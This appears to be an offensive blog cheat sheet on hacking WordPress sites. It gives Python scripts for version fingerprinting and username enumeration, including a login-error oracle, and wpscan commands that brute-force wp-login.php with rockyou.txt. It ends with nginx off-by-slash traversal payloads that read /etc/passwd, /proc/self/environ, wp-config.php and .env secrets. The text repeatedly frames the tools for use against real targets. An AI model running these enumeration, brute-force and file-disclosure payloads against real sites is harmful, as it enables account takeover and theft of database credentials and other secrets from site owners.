Wordpress Hacking Stuff

WordPress sites are compromised mostly by automated attacks against a few common weaknesses: outdated plugins and themes, and weak or reused credentials. Attackers scan millions of sites for known flaws, and unpatched plugins and themes are the leading cause of compromise. A single vulnerable plugin can hand an attacker full control of the site, which is then used to install malware or redirect visitors.

Key Attack Methods

  • Version detection: fingerprint WordPress core, plugin and theme versions so they can be matched against known vulnerabilities.
  • CVE exploitation: exploit published vulnerabilities in core, plugins or themes before the site is patched.
  • Common and weak credentials: default or guessable usernames (admin, the site name) combined with weak passwords.
  • Plugin and theme vulnerabilities: the largest share of compromises; abandoned or unpatched extensions are the usual entry point.
  • Brute force and dictionary attacks: password guessing against wp-login.php or xmlrpc.php with leaked wordlists.
  • Session hijacking: stealing or forging authentication cookies to take over a logged-in session.
  • Phishing: tricking administrators into entering their credentials on a fake login page.
  • Exploiting core vulnerabilities: flaws in WordPress itself; rarer, but they hit every unpatched install at once.
  • Malware distribution via blockchain: compromised sites fetch their payload from blockchain smart contracts (the "EtherHiding" technique), which makes the malicious code hard to take down.

Manual Hacking

Version

# Manually check the page source
Press Ctrl + U to view the source, then Ctrl + F and search for "wordpress".
Look for <meta name="generator" content="WordPress x.y.z">, /wp-content/ and
/wp-includes/ asset paths, and the ?ver= parameter on core scripts and styles
(bundled libraries such as jQuery carry their own version, core assets carry the
WordPress version). /readme.html also states the core version unless removed.

# Curl
curl -s http://example.com/ | grep -i 'wordpress'     # http
curl -s https://example.com/ | grep -i 'wordpress'    # https
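The same checks automated, as an added example (not code from the original post): it fingerprints a page body through the generator meta tag, falls back to the ?ver= parameters on /wp-includes/ assets when the tag has been removed, and parses the version out of /readme.html. The HTML bodies are constructed samples, and the fetch helper's User-Agent value is an assumption; nothing here is fetched from a live site.

```python
import re
from collections import Counter
from urllib.request import Request, urlopen

# Attribute order in the generator tag varies between themes, so try both orders.
GENERATOR_PATTERNS = [
    re.compile(r'<meta[^>]*name=["\']generator["\'][^>]*content=["\']WordPress\s*([\d.]+)', re.I),
    re.compile(r'<meta[^>]*content=["\']WordPress\s*([\d.]+)[^>]*name=["\']generator["\']', re.I),
]
# Core assets under /wp-includes/ carry ?ver=<core version>; bundled libraries
# (jQuery etc.) carry their own version, so the most common value wins.
CORE_ASSET_VER = re.compile(r'/wp-includes/[^"\'\s>]*\?ver=([\d.]+)')
WP_PATHS = re.compile(r'/wp-(?:content|includes)/')
README_VERSION = re.compile(r'Version\s+([\d.]+)')


def fingerprint_wordpress(html):
    """Return {'is_wordpress': bool, 'version': str|None, 'evidence': [...]} for one HTML body."""
    result = {"is_wordpress": False, "version": None, "evidence": []}
    if WP_PATHS.search(html):
        result["is_wordpress"] = True
        result["evidence"].append("wp-content/wp-includes asset paths")
    for pattern in GENERATOR_PATTERNS:
        m = pattern.search(html)
        if m:
            result.update(is_wordpress=True, version=m.group(1))
            result["evidence"].append("generator meta tag")
            return result
    versions = CORE_ASSET_VER.findall(html)
    if versions:
        result["is_wordpress"] = True
        result["version"] = Counter(versions).most_common(1)[0][0]
        result["evidence"].append("?ver= on wp-includes assets")
    return result


def parse_readme_version(text):
    """/readme.html ships with core and states 'Version X.Y.Z' unless the admin removed the file."""
    m = README_VERSION.search(text)
    return m.group(1) if m else None


def fetch(url, timeout=10):
    """Live helper (not used by the offline demo): GET a URL and return the body as text."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})  # assumed UA, adjust as needed
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample bodies (not captured from a real site).
SAMPLE_WITH_GENERATOR = """<html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel="stylesheet" href="https://example.com/wp-content/themes/twentytwentyfour/style.css?ver=1.0" />
</head><body></body></html>"""

SAMPLE_NO_GENERATOR = """<html><head>
<link rel="stylesheet" id="wp-block-library-css" href="https://example.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.2" />
<script src="https://example.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1"></script>
<script src="https://example.com/wp-includes/js/wp-emoji-release.min.js?ver=6.4.2"></script>
<script src="https://example.com/wp-content/plugins/some-plugin/js/main.js?ver=2.1.0"></script>
</head><body></body></html>"""

SAMPLE_README = '<h1 id="logo"><a href="https://wordpress.org/">WordPress</a></h1>\n<p>Version 6.4.2</p>'

if __name__ == "__main__":
    for body in (SAMPLE_WITH_GENERATOR, SAMPLE_NO_GENERATOR):
        print(fingerprint_wordpress(body))
    print(parse_readme_version(SAMPLE_README))
```

To run it against a real target, pass fetch("https://example.com/") into fingerprint_wordpress and fetch("https://example.com/readme.html") into parse_readme_version; a site behind a cache or security plugin may strip the generator tag, which is why the asset fallback matters.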

Username

# Sitemaps (the core user sitemap exists since WordPress 5.5; author-sitemap.xml is generated by Yoast SEO)
      /wp-sitemap-users-1.xml
      /sitemap.xml
      /author-sitemap.xml

# Author archives
      /author/username/      # /?author=N redirects here when archives are enabled; iterate N

# oEmbed API (needs the URL of an existing post; the author_name field is the display name)
      /?rest_route=/oembed/1.0/embed&url=

# REST API (slug is usually the login name; name is only the display name)
      /wp-json/wp/v2/users
      curl -s https://example.com/wp-json/wp/v2/users | grep -iE '"(name|slug)"'

# Login page error messages
      wp-login.php words its error differently for an unknown username and for a wrong password,
      so it can be used to confirm whether each candidate account exists.
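The enumeration sources above, combined in one script, as an added example that is not part of the original post: it parses the REST users endpoint, the core user sitemap, the /?author=N redirect target and the oEmbed author field, and classifies wp-login.php error pages into the username oracle. All responses are constructed samples; the error strings are those wp-login.php has used in recent releases (older ones said "Invalid username"), and hosts that disable the REST endpoint or hide users without published posts will leave the wp-json source empty.

```python
import json
import re
import xml.etree.ElementTree as ET

SITEMAP_NS = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}
# wp-login.php wording for a failed login; current releases use the first "unknown"
# string, older ones said "Invalid username". The difference is the oracle.
UNKNOWN_USER_MARKERS = ("is not registered on this site", "Invalid username")
KNOWN_USER_MARKER = "The password you entered for the username"


def users_from_rest(body):
    """Parse /wp-json/wp/v2/users; 'slug' is normally the login name, 'name' only the display name."""
    return [{"id": u.get("id"), "login": u.get("slug"), "display": u.get("name")}
            for u in json.loads(body)]


def users_from_sitemap(xml_text):
    """Parse wp-sitemap-users-1.xml; each <loc> is an author archive ending in the login slug."""
    root = ET.fromstring(xml_text)
    return [loc.text.rstrip("/").rsplit("/", 1)[-1]
            for loc in root.findall(".//sm:loc", SITEMAP_NS)]


def author_from_redirect(location_header):
    """/?author=N answers with a redirect to /author/<login>/ when author archives are enabled."""
    m = re.search(r"/author/([^/?#]+)", location_header or "")
    return m.group(1) if m else None


def author_from_oembed(body):
    """The oEmbed endpoint returns 'author_name' for a post URL (display name, not the login)."""
    return json.loads(body).get("author_name")


def classify_login_response(body):
    """Turn a wp-login.php error page into a verdict about the username that was submitted."""
    if any(marker in body for marker in UNKNOWN_USER_MARKERS):
        return "unknown-user"
    if KNOWN_USER_MARKER in body:
        return "valid-user"
    return "inconclusive"


def enumerate_candidates(rest_body=None, sitemap_xml=None, redirect_locations=()):
    """Merge the sources into {login: [sources]} so each candidate carries its provenance."""
    found = {}
    if rest_body:
        for u in users_from_rest(rest_body):
            found.setdefault(u["login"], set()).add("wp-json")
    if sitemap_xml:
        for slug in users_from_sitemap(sitemap_xml):
            found.setdefault(slug, set()).add("sitemap")
    for location in redirect_locations:
        slug = author_from_redirect(location)
        if slug:
            found.setdefault(slug, set()).add("author-redirect")
    return {login: sorted(sources) for login, sources in found.items()}


# Constructed sample responses (not captured from any real site).
SAMPLE_REST = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://example.com/author/admin/"},
    {"id": 3, "name": "Jane Editor", "slug": "jane", "link": "https://example.com/author/jane/"},
])
SAMPLE_SITEMAP = """<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://example.com/author/admin/</loc></url>
  <url><loc>https://example.com/author/jane/</loc></url>
</urlset>"""
SAMPLE_REDIRECT = "https://example.com/author/admin/"
SAMPLE_OEMBED = json.dumps({"version": "1.0", "author_name": "Site Admin",
                            "author_url": "https://example.com/author/admin/"})
SAMPLE_LOGIN_UNKNOWN = ('<div id="login_error"><strong>Error:</strong> The username '
                        '<strong>bob</strong> is not registered on this site.</div>')
SAMPLE_LOGIN_KNOWN = ('<div id="login_error"><strong>Error:</strong> The password you entered '
                      'for the username <strong>admin</strong> is incorrect.</div>')

if __name__ == "__main__":
    print(enumerate_candidates(SAMPLE_REST, SAMPLE_SITEMAP, [SAMPLE_REDIRECT]))
    print(author_from_oembed(SAMPLE_OEMBED))
    for page in (SAMPLE_LOGIN_UNKNOWN, SAMPLE_LOGIN_KNOWN):
        print(classify_login_response(page))
```

The login oracle only confirms candidates; it does not discover them, so run it last and sparingly, because each probe is a failed login that lockout plugins count.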

More to be added soon…

Automated Hacking

Version

# Version, theme and other interesting findings are reported by default;
# the API token adds vulnerability data from the WPScan database (a free tier exists)
wpscan --url http://example.com --api-token YOUR_API_TOKEN

Username

# Enumerate users (author archives, REST API, oEmbed, login error messages)
wpscan --url http://example.com --enumerate u --api-token YOUR_API_TOKEN

Login Page Username and Password Brute force

# Enumerate users, then brute-force each one with the wordlist
wpscan --url https://example.com/ -e u -P /usr/share/wordlists/rockyou.txt

# Brute-force a single known user; more threads is faster but noisier
wpscan --url https://example.com/ -U admin -P /usr/share/wordlists/rockyou.txt --threads 10

# Expect lockouts and rate limiting from login-protection plugins or a WAF:
# a full rockyou run against a live target is loud and usually gets blocked.

⚡Overall Power

# ap/vp/p and at/vt/t are mutually exclusive choices for -e, so pick one per component type;
# this scan enumerates only vulnerable plugins and themes and writes a JSON report
wpscan --url https://example.com/ -e vp,vt,tt,cb,dbe,u,m --api-token <token> --format json --output scan.json

ap ---> All plugins (cannot be combined with vp or p)
vp ---> Vulnerable plugins
at ---> All themes (cannot be combined with vt or t)
vt ---> Vulnerable themes
tt ---> Timthumbs
cb ---> Config backups (e.g. wp-config.php.bak)
dbe --> Database exports
u  ---> User IDs (a range can be given, e.g. u1-20)
m  ---> Media IDs (a range can be given)
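A JSON report is only useful if something reads it. As an added example (not part of the original post or of WPScan itself), the script below reduces a scan.json to the items that need action: vulnerable components with their installed and fixed versions and CVE ids, plugins whose version WPScan could not determine, and enumerated users. The report fragment is constructed in the shape WPScan's JSON formatter produces; that schema is an assumption taken from the tool's output and may differ between releases.

```python
import json


def _flatten(component, installed, vulns):
    """Turn one component's vulnerability list into flat finding dicts."""
    return [{
        "component": component,
        "installed": installed,
        "title": v.get("title"),
        "fixed_in": v.get("fixed_in"),
        "cves": [f"CVE-{c}" for c in (v.get("references") or {}).get("cve", [])],
    } for v in (vulns or [])]


def summarize_wpscan(scan):
    """Reduce a WPScan JSON report to actionable items: vulnerable components and enumerated users."""
    core = scan.get("version") or {}
    findings = _flatten("core WordPress", core.get("number"), core.get("vulnerabilities"))
    unknown_version = []
    for kind in ("plugins", "themes"):
        for slug, info in (scan.get(kind) or {}).items():
            # version is null when WPScan could not determine it; such components need manual review
            installed = (info.get("version") or {}).get("number")
            if installed is None:
                unknown_version.append(slug)
            findings += _flatten(f"{kind[:-1]} {slug}", installed, info.get("vulnerabilities"))
    return {
        "target": scan.get("target_url"),
        "core_version": core.get("number"),
        "users": sorted(scan.get("users") or {}),
        "findings": findings,
        "unknown_version": unknown_version,
    }


def load_report(path):
    """Read the file written by --format json --output and summarize it."""
    with open(path, encoding="utf-8") as fh:
        return summarize_wpscan(json.load(fh))


# Constructed report fragment (assumed schema, not a real scan result). The plugin
# finding reuses the CVE discussed later on this page.
SAMPLE_SCAN = json.loads("""
{
  "target_url": "https://example.com/",
  "version": {"number": "6.4.2", "status": "latest", "vulnerabilities": []},
  "plugins": {
    "backup-backup": {
      "slug": "backup-backup",
      "version": {"number": "1.3.7"},
      "vulnerabilities": [{
        "title": "Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution",
        "fixed_in": "1.3.8",
        "references": {"cve": ["2023-6553"]}
      }]
    },
    "some-plugin": {"slug": "some-plugin", "version": null, "vulnerabilities": []}
  },
  "themes": {},
  "users": {"admin": {"id": 1}, "jane": {"id": 3}}
}
""")

if __name__ == "__main__":
    print(json.dumps(summarize_wpscan(SAMPLE_SCAN), indent=2))
```

Run load_report("scan.json") after the wpscan command above; components listed under unknown_version are the ones to check by hand, since WPScan cannot match them against its database without a version.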

More to be added soon…

CVE Exploitation

CVE-2023-6553

CVE-2023-6553 is an unauthenticated remote code execution vulnerability in the Backup Migration WordPress plugin, affecting versions up to and including 1.3.7 (fixed in 1.3.8). The flaw is in the plugin's /includes/backup-heart.php, which builds an include path from a request header the attacker controls, so arbitrary PHP can be executed without credentials. Backups produced by the plugin can be downloaded from under the /wp-content/uploads/ directory.

Detection: the nuclei-templates repository carries a template for CVE-2023-6553; a version check against the plugin's readme.txt is the quick manual alternative.
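A version check is the safe way to confirm exposure before touching the vulnerable file. As an added example (not from the original post), the script below reads the "Stable tag" line of a plugin's public readme.txt and compares it numerically against the first fixed release; the readme text is a constructed sample, and the plugin directory name backup-backup is the wordpress.org slug for Backup Migration. The check is generic: pass any slug and fixed version.

```python
import re

# wordpress.org plugins ship a readme.txt at this path; slug is the plugin directory name
# (backup-backup for Backup Migration).
README_PATH = "/wp-content/plugins/{slug}/readme.txt"
STABLE_TAG = re.compile(r"^Stable tag:\s*(\S+)", re.I | re.M)
VERSION_RE = re.compile(r"\d+(?:\.\d+)*")


def parse_stable_tag(readme_text):
    """Return the 'Stable tag' version string, or None when absent or not numeric ('trunk')."""
    m = STABLE_TAG.search(readme_text)
    if not m or not VERSION_RE.fullmatch(m.group(1)):
        return None
    return m.group(1)


def version_key(version):
    """Compare versions numerically, padding so that 1.4 == 1.4.0 (a string compare would get 1.3.10 wrong)."""
    parts = [int(p) for p in version.split(".")]
    return tuple(parts + [0] * (4 - len(parts)))


def is_vulnerable(installed, fixed_in):
    """True when the installed version is strictly older than the first fixed release."""
    return version_key(installed) < version_key(fixed_in)


def check_plugin(slug, readme_text, fixed_in):
    """Summarize one plugin: where the readme lives, what it claims, and whether that is below the fix."""
    installed = parse_stable_tag(readme_text)
    return {
        "slug": slug,
        "readme_path": README_PATH.format(slug=slug),
        "installed": installed,
        "fixed_in": fixed_in,
        "vulnerable": None if installed is None else is_vulnerable(installed, fixed_in),
    }


# Constructed readme fragment (not fetched from a real site).
SAMPLE_README = """=== Backup Migration ===
Requires at least: 5.0
Tested up to: 6.4
Stable tag: 1.3.7
License: GPLv3
"""

if __name__ == "__main__":
    print(check_plugin("backup-backup", SAMPLE_README, fixed_in="1.3.8"))
```

The readme can lag the code actually installed (or say "trunk"), so treat a "vulnerable" result as a lead to confirm, not proof; when it returns None, fall back to WPScan's plugin version detection.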

LFI

Local File Inclusion (nginx alias traversal)

The paths below exploit an nginx "off-by-slash" alias: a block such as
location /wordpress/images { alias /var/www/html/wordpress/images/; } has no trailing slash on the
location, so a request for /wordpress/images../wp-config.php still matches the prefix and nginx appends
../wp-config.php to the alias directory, serving files from the parent directory. nginx normalises any
further ../ segments before matching, so this climbs exactly one level above the aliased directory;
which of the files below are reachable depends on where the alias points.

/wordpress/images../etc/passwd
/wordpress/images../etc/nginx/sites-available/default
/wordpress/images../proc/self/cmdline
/wordpress/images../proc/self/environ
/wordpress/images../wp-config.php
/wordpress/images../.env
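To see why the payload shape matters, here is a small simulation of nginx's alias mapping, added as an example that is not from the original post: it shows the vulnerable location resolving /wordpress/images../wp-config.php to the parent directory, the fixed location (trailing slash) rejecting it, and a second ../ being normalised away before matching. The nginx configuration and document path are assumptions; the probe builder reproduces the list above for any location, and the classifier recognises common leaked files in a response body.

```python
import posixpath
import re

# Assumed nginx configuration that produces the traversal (vulnerable) and the one-character fix:
#
#   location /wordpress/images  { alias /var/www/html/wordpress/images/; }   # vulnerable: no trailing slash
#   location /wordpress/images/ { alias /var/www/html/wordpress/images/; }   # fixed
#
VULNERABLE_LOCATION = "/wordpress/images"
FIXED_LOCATION = "/wordpress/images/"
ALIAS = "/var/www/html/wordpress/images/"  # assumed document path


def resolve_alias(location, alias, uri):
    """Approximate how nginx maps a request URI to a file for a prefix location with 'alias'."""
    # nginx resolves '.' and '..' segments in the URI before matching locations, so a
    # standalone ../ never reaches the alias; only '..' glued to the last name survives.
    uri = posixpath.normpath(uri)
    if not uri.startswith(location):
        return None
    # alias replaces the matched prefix: whatever follows the prefix is appended verbatim.
    return posixpath.normpath(alias + uri[len(location):])


def traversal_probes(location, targets):
    """Build the off-by-slash probe URLs for files one level above the aliased directory."""
    return [f"{location}../{target.lstrip('/')}" for target in targets]


LEAK_SIGNATURES = {
    "passwd": re.compile(r"^root:x:0:0:", re.M),
    "wp-config": re.compile(r"define\(\s*['\"]DB_PASSWORD['\"]"),
    "nginx-config": re.compile(r"^\s*server\s*\{", re.M),
    "dotenv": re.compile(r"^[A-Z_]+=.*$", re.M),  # checked last: the loosest pattern
}


def classify_leak(body):
    """Name the sensitive file a response body looks like, or None for an ordinary page."""
    for name, pattern in LEAK_SIGNATURES.items():
        if pattern.search(body):
            return name
    return None


if __name__ == "__main__":
    for probe in traversal_probes(VULNERABLE_LOCATION, ["wp-config.php", ".env", "etc/passwd"]):
        print(probe, "->", resolve_alias(VULNERABLE_LOCATION, ALIAS, probe),
              "| fixed:", resolve_alias(FIXED_LOCATION, ALIAS, probe))
    print(resolve_alias(VULNERABLE_LOCATION, ALIAS, "/wordpress/images../../wp-config.php"))
```

With the assumed alias, images../wp-config.php lands on /var/www/html/wordpress/wp-config.php while images../etc/passwd lands on /var/www/html/wordpress/etc/passwd, which is why the first works on a typical layout and the system-file probes only do when the alias sits directly under /.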
This post is licensed under CC BY 4.0 by the author.